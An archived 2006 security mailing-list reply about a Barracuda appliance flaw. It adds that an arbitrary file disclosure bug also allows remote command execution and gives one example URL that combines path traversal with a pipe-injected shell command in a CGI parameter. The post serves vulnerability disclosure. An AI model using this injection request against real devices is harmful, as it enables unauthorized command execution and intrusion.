lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
This website is powered by Openwall GNU/*/Linux security-enhanced OS
[<prev] [next>] [<thread-prev] [month] [year] [list] 
Date: Thu, 03 Aug 2006 17:01:01 +0100
From: Matthew Hall <lists@...c.co.uk>
To: gssincla@...software.com
Subject: Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]

gssincla@...software.com wrote:
> Title: Barracuda Arbitrary File Disclosure

This vulnerability doesn't just allow arbitrary file disclosure, but
also allows remote execution of commands through use of the pipe
characher (|), e.g:

https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|

Regards,
Matt

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux